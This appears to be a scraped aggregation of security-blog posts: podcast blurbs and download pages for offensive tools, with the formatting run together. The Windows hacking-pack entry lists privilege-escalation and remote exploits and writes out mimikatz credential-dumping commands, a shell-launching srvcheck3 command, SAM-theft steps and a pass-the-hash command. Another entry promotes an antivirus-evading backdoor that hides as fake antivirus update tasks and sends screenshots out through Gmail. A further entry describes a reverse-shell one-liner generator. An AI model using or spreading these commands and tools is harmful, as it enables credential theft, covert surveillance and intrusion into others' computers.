Windows, Nintendo, and LinkedIN – Hack Naked News #170

This week, Apple and issues of trust, LinkedIN leaks, spending money on ransomware, dead fingerprints, mysterious medical hacks, and hacking the Nintendo switch with no patches even possible? Jason Wood from Paladin Security joins us for expert commentary, and more on this episode of Hack Naked News! Security News ‘iTunes Wi-Fi Sync’ Feature Could Let […]
The post Windows, Nintendo, and LinkedIN – Hack Naked News #170 appeared first on Security Weekly.


WHP – Microsoft Windows Hacking Pack

M$ Windows Hacking Pack===========Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may be not (eg. sysinternals).”pes" means "PE Scambled". It’s useful sometimes.Remote Exploits===========Windows 2000 / XP SP1MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too XP/NT (beofre SP2)MS03-026 Microsoft RPC DCOM Interface Overflow ( XP (SP2 and SP3) (can be used also for priv esc)MS08-067 Remote Stack Overflow Vulnerability Exploit (srvscv) Windows 7 and Server 2008 R2 (x64) All Service PacksMS17-010 aka "Eternal Blue" Server 2016 (DoS, may lead to exec)"Fuzzing SMB" video, showing the crash: Escalation===========First, if you have meterpreter, it may be a good idea to try "getsystem".srvcheck3.exe=====Privilege escalation for Windows XP SP2 and beforeThis can exploit vulnerable services. srvcheck3.exe -m upnphost -H -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"KiTrap0D.tar=====Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7MS10-015 / CVE-2010-0232 / ways of exploits listed=====Windows XP/2003MS11-080 → Local Privilege Escalation Exploit Afd.sys Vista/7 CVE: 2010-4398 Elevation of Privileges (UAC Bypass) 8.1 (and before)MS14-058 → TrackPopupMenu Privilege Escalation 8.1 (and before)MS15-051 Win32k LPE vulnerability used in APT attack "taihou32" 10 (and before)Hot Potato (nbns spoof + wpad + smb ntlm) 10 (and before)Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.Technique presented here: XP SP2 (and before)srvcheck3.exe – upnp service or SSDPSRV service Windows XP/2003MS11-080 → Local Privilege Escalation Exploit Afd.sys Vista/7 CVE: 2010-4398 Elevation of Privileges (UAC Bypass) 8.1 (and before)MS14-058 → TrackPopupMenu Privilege Escalation 8.1 (and before)MS15-051 Win32k LPE vulnerability used in APT attack "taihou32" NT/2K/XP/2K3/Vista/2K8/7/8KiTrap0D – EPATHOBJ Local Ring Exploit 10 (and before)Hot Potato (nbns spoof + wpad + smb ntlm) XP (and after).lnk exploit for receiving NetNTLM hashes remotely. files if contain samWindows/system32/config/SAM/WINDOWS/repair/SAMregedit.exe HKEY_LOCAL_MACHINE -> SAMTools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&AbelOtherwise just copy.Dump SAM through shadow volumeIf it can be created the database could be copied from this.Vista command: vssadmin create shadowServer 2008 command: diskshadowWindows Credentials EditorWCE / Windows Credentials Editor can recover password hashes from LSASS – supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions). Mimikatz dumpingmimikatz # privilege::debugmimikatz # sekurlsa::logonpasswordsmimikatz # lsadump::samCachedump aka In-memory attacks for SAM hashes / Cached Domain Credentialsfgdump.exe (contains pwdump and cachedump, can read from memory)SAM dump (hive)"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."Dump SAM, then spray hasheskeimpx (try hashes with different users, against domain accounts) dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XPLSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel (before Windows 8.1)pth-winexe –user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 // cmdPassTheTicket (Kerberos)mimikatz can do itDuplicate Access Tokens (if admin access token can be used, it’s win) "Kidnapping"MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority) notablelo toolspsexec, smbshell, metasploit’s psexec, etc – It allows to visualize connections in an AD domain and find fast escalation ways.To Be Added===========- –> Stuff for dumping passwords- openvpn- evilgradeHashes (SHA256) and VirusTotal scans===========8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333 AwesomerShell.tar7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051 KiTrap0D.tar96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389 LICENSE.txtb3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e ncat.exeda24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b ncat_pes.exebe4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b nc.exe56580f1eebdccfbc5ce6d75690600225738ddbe8d991a417e56032869b0f43c7 nmap-7.12-setup-gui.exe0cb7c3d9c4a0ce86f44ab4d0db2de264b64abbb83ef453afe05f5fddf330a1c5 nmap-7.12-win32_commandline.zip976c216119d5627afc9ad29fd4f72e38de3711d65419fda6482bc795e0ebf654 plink.exe952aa0bfb7ea58669fb50b945a09e9e69cd178739c5d1281a45ecfc54cc7f92f srvcheck3.execa5214e14ed5e879dd000a8a13895c474c89248386e9d337dd43f105a70f4170 PEScrambler.exeef0f4bf2267b866a00b3e60c0e70f7f37cc5529fee417a625e502b3c93d215d9 SysinternalsSuite.zip8e9bc40efd17a37a4ecf7ada7a3d739f343e207abe4e17f05a531baccc607336 windows-privesc-check.exe6c367696e6cc8e6093426dbd19daf13b2375b0c078387ae6355519522d23b0fd windows-privesc-check.pyffe3808989bdfe986b17023e5d6583d49d644182e81234dc1db604e260ba76c9 fgdump.exec36225d4515a92b905f8337acfd3d365cb813a2654e65067dbdba4fc58e7126a kaht2.zip2951e49efbc9e18d4641c0061f10da021b4bca2bd51247fe80107cbd334c195d mimikatz_2-1.zip0682a92bc96a66cf3e3eca1e44296838b9baad4feef0c391fc48044e039e642a ms08-067_exploit_31874.pycc4b4eceb04142b9e0794be029302feb33cf58c6a0cd1fdca3ff611df9b83827 ms08-067_exploit_7132.py950bbdde2cc92799675c138fd8dfb2b60f0c01759533bc1a6993559508bd131e Responder.tar54bd6cccf4c74604eb9956ce167a3ea94a06fabf4954e691d020023f8827c448 samdump2.exeece925f85dc15b816dacacbb92ad41045f0cc58c2e10c5d3b66723ae11cf65c8 wce_getlsasrvaddr.exec6333c684762ed4b4129c7f9f49c88c33384b66dfb1f100e459ec6f18526dff7 wce_v1_41beta_universal.exeecbac2a6c0bf8dbc7bed2370ed098cd43a56b0d69a0db1d5715751270711f1d6 wce_v1_42beta_x32.exe5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976 sources/nc110.tgz47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9 sources/rdp2tcp-0.1.tar.gz33d109696d22b7e89f4eac6d07f4b4461551247ce2bfcbead09373ce39364f78 sources/srvcheck3.zipf706df25bb061a669b13ff76c121a8d72140406c7b0930bae5dcf713f9520a56 sources/3proxy-0.8.6.tar.gz7e8cfbf10bcc91fa9b9a60d3335d4a52bd6d4b6ca888533dbdd2afc86bebb5cc sources/3proxy-0.9-devel.tgzdec12905822ea64676d0ec58b62c00631ef8ddde2c700ffe74bfcf9026f17d81 sources/fgdump-2.1.0.tar.bz2352888e441be33ae6266cfac1a072d52cfaafd65cc33b07daa51600f1cd803ca sources/impacket_0-9-15.tar21faf49ae9ff08054214675f18d813bcf042798c325d68ae8b2417a119b439f4 sources/keimpx-0.3-dev.tar16136256911c31f7c56eef415b11e14c13abe89cface46df78033456194eddfd sources/mimikatz-2016-06.zip602659af30c565750fa01650e0a223d26355b5df98f2fbc30e3a6c593ed4e526 sources/samdump2-3.0.0.tar.bz2ncat.exeSHA256: b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b 5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976 47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9 WHP


Phishing 2FA Tokens with CredSniper – Tradecraft Security Weekly #25

Organizations are implementing two-factor on more and more web services. The traditional methods for phishing credentials is no longer good enough to gain access to user accounts if 2FA is setup. In this episode Mike Felch (@ustayready) and Beau Bullock (@dafthack) demonstrate a tool that Mike wrote called CredSniper that assists in cloning portals for […]
The post Phishing 2FA Tokens with CredSniper – Tradecraft Security Weekly #25 appeared first on Security Weekly.


Powershell-RAT – Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment.This RAT will help someone during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.Note: This piece of code is Fully UnDetectable (FUD) by Anti-Virus (AV) software. This project must not be used for illegal purposes or for hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with.Any suggestions or ideas for this tool are welcome – just tweet me on @ManiarViralScreenshotsOn the first run of the Powershell-RAT user will get options as below:Using Hail Mary option to backdoor a Windows machine:Successfully taking screenshots of the user activity:Data exfiltrated as an email attachment using Gmail:My Windows machine do not have Python installed, what should I do? Compile into an executable using Pyinstaller PyInstaller is available on PyPI. You can install it through pip: pip install pyinstallerSetupThrowaway Gmail email addressEnable “Allow less secure apps" by going to the $username & $password variable for your account in the Mail.ps1 Powershell fileModify $msg.From & $msg.To.Add with throwaway gmail addressHow do I use this? Press 1: This option sets the execution policy to unrestricted using Set-ExecutionPolicy Unrestricted. This is useful on administrator machine Press 2: This takes the screenshot of the current screen on the user machine using Shoot.ps1 Powershell script Press 3: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesCore Press 4: This option sends an email from the user machine using Powershell. These uses Mail.ps1 file to send screenshot as attachment to exfiltrate data Press 5: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesUA Press 6: This option deletes the screenshots from user machine to remain stealthy Press 7: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesDF Press 8: This option performs all of the above with a single button press 8 on a keyboard. Attacker will receive an email every 5 minutes with screenshots as an email attachment. Screenshots will be deleted after 12 minutes Press 9: Exit gracefully from the program or press Control+C Questions?Twitter: LinkedIn: Download Powershell-RAT


Cisco, Kali, Equifax, & Facebook – Paul’s Security Weekly #550

In the news, Cisco hardcoded passwords, Kali on Windows, Equifax recovers $114 million on $26.5 million in expenses from breach, and more on this episode of Paul’s Security Weekly! Larry’s Stories Cisco hardcoded passwords Memcahed DDoS will be a big deal – and some more, and a killswitch CTFR – Subdomain bruteforcing via TLS certificate transparency….scripted] Kali on windows […]
The post Cisco, Kali, Equifax, & Facebook – Paul’s Security Weekly #550 appeared first on Security Weekly.


BLEAH – A BLE Scanner For “Smart” Devices Hacking

A BLE scanner for “smart" devices hacking based on the bluepy library, dead easy to use because retarded devices should be dead easy to hack. Explanatory post and screenshots can be found here.How to InstallInstall bluepy from source:git clone bluepypython buildsudo python installThen install bleah:git clone bleahpython buildsudo python installUsageFrom the -h help menu:usage: bleah [-h] [-i HCI] [-t TIMEOUT] [-s SENSITIVITY] [-b MAC] [-f] [-e] [-u UUID] [-d DATA] [-r DATAFILE]optional arguments: -h, –help show this help message and exit -i HCI, –hci HCI HCI device index. -t TIMEOUT, –timeout TIMEOUT Scan delay, 0 for continuous scanning. -s SENSITIVITY, –sensitivity SENSITIVITY dBm threshold. -b MAC, –mac MAC Filter by device address. -f, –force Try to connect even if the device doesn’t allow to. -e, –enumerate Connect to available devices and perform services enumeration. -u UUID, –uuid UUID Write data to this characteristic UUID (requires –mac and –data). -d DATA, –data DATA Data to be written. -r DATAFILE, –datafile DATAFILE Read data to be written from this file.ExamplesKeep scanning for BTLE devices:sudo bleah -t0Connect to a specific device and enumerate all the things:sudo bleah -b "aa:bb:cc:dd:ee:ff" -eWrite the bytes hello world to a specific characteristic of the device:sudo bleah -b "aa:bb:cc:dd:ee:ff" -u "c7d25540-31dd-11e2-81c1-0800200c9a66" -d "hello world"Download BLEAH


Information gathering tool – OSINT

GasMasK is an Information gathering tool. Download git clone Information Gathering ask bing crt dns dogpile github google googleplus instagram linkedin netcraft pgp reddit reverse dns twitter vhosts virustotal whois yahoo yandex youtube ______ __ ___ __ __ / ____/___ ______/ |/ /___ ______/ //_/ / / __/ __ `/ ___/ /|_/ / …


One-Lin3r – Gives you one-liners that aids in penetration testing operations

One-Lin3r is simple and light-weight framework inspired by the web-delivery module in Metasploit.It consists of various one-liners that aids in penetration testing operations:Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.Other: Holds liners with general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc…) on the trending OSes (Windows, Linux, and macOS) “More OSes can be added too".FeaturesSearch for any one-liner in the database by its full name or partially.You can add your own liners by following these steps to create a ".liner" file.Also you can send it to me directly and it will be added in the framework and credited with your name .Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies ).Command line arguments can be used to give the framework a resource file to load and execute for automation.The ability to reload the database if you added any liner without restarting the framework.You can add any platform to the payloads database just by making a folder in payloads folder and creating a ".liner" file there.More…The payloads database is not that big in the meantime because this the first edition but it will get bigger with updates and contributions.ScreenshotsUsageCommandline argumentsusage: [-h] [-r R] [-x X] [-q]optional arguments: -h, –help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). -q Quit mode (no banner).Framework commandsCommand Description——– ————-help/? Show this help menulist/show List payloads you can use in the Search payloads for a specific oneuse <payload> Use an available payloadinfo <payload> Get information about an available payloadbanner Display bannerreload/refresh Reload the payloads databasecheck Prints the core version and database version then check for them online.history Display command line most important history from the beginningsave_history Save command line history to a fileexit/quit Exit the frameworkInstalling and requirementsTo make the tool work at its best you must have :Python 3.x or 2.x (preferred 3).Linux (Tested on kali rolling) or Windows system (Not tested yet on MacOS but it should work).The requirements mentioned in the next few lines.Installing+For windows : (After downloading ZIP and upzip it)cd One-Lin3r-masterpython -m pip install -r win_requirements.txtpython -h+For Linux:git clone 777 -R One-Lin3rcd One-Lin3rpip install -r requirements.txtpython -hVideo ContactTwitterDownload One-Lin3r